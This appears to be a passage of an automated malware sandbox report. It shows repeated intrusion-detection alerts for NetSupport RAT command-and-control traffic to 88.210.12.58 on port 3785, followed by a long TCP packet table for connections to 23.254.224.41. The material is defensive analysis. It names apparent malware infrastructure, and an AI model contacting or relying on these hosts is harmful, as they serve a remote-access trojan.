2024-12-10T08:59:22.511002+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.611061+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.712003+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.812007+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:22.912742+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.014815+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.116746+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.213022+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.316740+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.416747+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.514104+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.615026+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.715014+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.816734+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:23.916013+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.017034+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.117017+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.218054+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.319061+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.420058+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.521079+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.621055+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.722050+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.822015+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:24.924751+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.024863+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.124745+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.223018+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.324019+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.424014+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.524001+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.625077+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.728747+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.828748+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:25.927056+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.028056+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.128049+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.229045+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.330020+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.430059+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.531056+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.632097+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.732032+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.832022+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:26.934875+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP
2024-12-10T08:59:27.036758+0100	2827745	ETPRO MALWARE NetSupport RAT CnC Activity	1	192.168.2.6	49723	88.210.12.58	3785	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 08:57:15.290249109 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:15.290268898 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:15.290379047 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:15.301498890 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:15.301516056 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.053482056 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.053628922 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.124295950 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.124304056 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.124561071 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.124617100 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.127526045 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.171333075 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.526806116 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.526829004 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.526863098 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.526879072 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.526889086 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.526926994 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.590595007 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.590679884 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.720062971 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.720155001 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.753379107 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.753464937 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.778533936 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.778610945 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.784333944 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.784378052 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.784404039 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.784442902 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.784794092 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.784802914 CET	443	49707	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.784812927 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.784861088 CET	49707	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.821093082 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.821119070 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:17.821197987 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.821551085 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:17.821559906 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.192687035 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.192894936 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.199593067 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.199598074 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.203628063 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.203630924 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.700720072 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.700757027 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.700777054 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.700784922 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.700810909 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.700864077 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.892865896 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.892946959 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.921722889 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.921797037 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.946773052 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.946840048 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:19.971893072 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:19.971967936 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.092797995 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.092869043 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.107166052 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.107233047 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.126492023 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.126562119 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.141119003 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.141185045 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.155666113 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.155730009 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.175091028 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.175153971 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.281560898 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.281677008 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.293276072 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.293365955 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.307131052 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.307228088 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.317272902 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.317365885 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.327656984 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.327766895 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.337826014 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.337917089 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.351329088 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.351447105 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.361534119 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.361615896 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.371921062 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.372019053 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.468728065 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.468820095 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.475869894 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.476033926 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.484060049 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.484136105 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.493442059 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.493532896 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.500606060 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.500677109 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.507339001 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.507411003 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.516202927 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.516273975 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.522970915 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.523051023 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.529771090 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.529948950 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.536581039 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.536658049 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.544344902 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.544430971 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.551186085 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.551273108 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.560034037 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.560100079 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.566840887 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.566925049 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.573581934 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.573669910 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.582478046 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.582540989 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.660980940 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.661079884 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.666487932 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.666558981 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.671624899 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.671705008 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.676491976 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.676572084 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.682662010 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.682753086 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.687275887 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.687371016 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.691735983 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.691812038 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.696079969 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.696160078 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.701627970 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.701705933 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.706324100 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.706393003 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.710608959 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.710669041 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.715167999 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.715248108 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.718835115 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.718918085 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.724122047 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.724210978 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.728225946 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.728307009 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.732357979 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.732449055 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.736419916 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.736500025 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.854536057 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.854645014 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.858472109 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.858539104 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.861524105 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.861586094 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.864754915 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.864813089 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.867328882 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.867382050 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.871175051 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.871278048 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.874105930 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.874191046 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.877121925 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.877211094 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.880928040 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.881042957 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.883481979 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.883558989 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.887290001 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.887365103 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.890187979 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.890263081 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.893203974 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.893280983 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.896267891 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.896332026 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.899981022 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.900043964 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:20.902904034 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:20.902961969 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.045731068 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.045847893 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.049506903 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.049565077 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.052428961 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.052495003 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.055474043 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.055536985 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.058507919 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.058583021 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.062201977 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.062266111 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.065128088 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.065191984 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.068154097 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.068219900 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.071119070 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.071193933 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.074882030 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.074965954 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.078315020 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.078388929 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.081242085 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.081325054 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.084289074 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.084383011 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.087253094 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.087340117 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.091005087 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.091082096 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.094398975 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.094472885 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.237482071 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.237541914 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.240400076 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.240493059 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.243431091 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.243498087 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.246366978 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.246439934 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.250207901 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.250271082 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.253077030 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.253144979 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.256129026 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.256191015 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.259932041 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.259995937 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.262893915 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.262954950 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.265872002 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.265944004 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.269174099 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.269243002 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.272248983 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.272317886 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.275234938 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.275291920 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.279004097 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.279061079 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.281863928 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.281954050 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.285063028 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.285135031 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.288964987 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.289024115 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.431397915 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.431474924 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.434942961 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.435012102 CET	49708	443	192.168.2.6	23.254.224.41
Dec 10, 2024 08:57:21.437874079 CET	443	49708	23.254.224.41	192.168.2.6
Dec 10, 2024 08:57:21.437956095 CET	49708	443	192.168.2.6	23.254.224.41
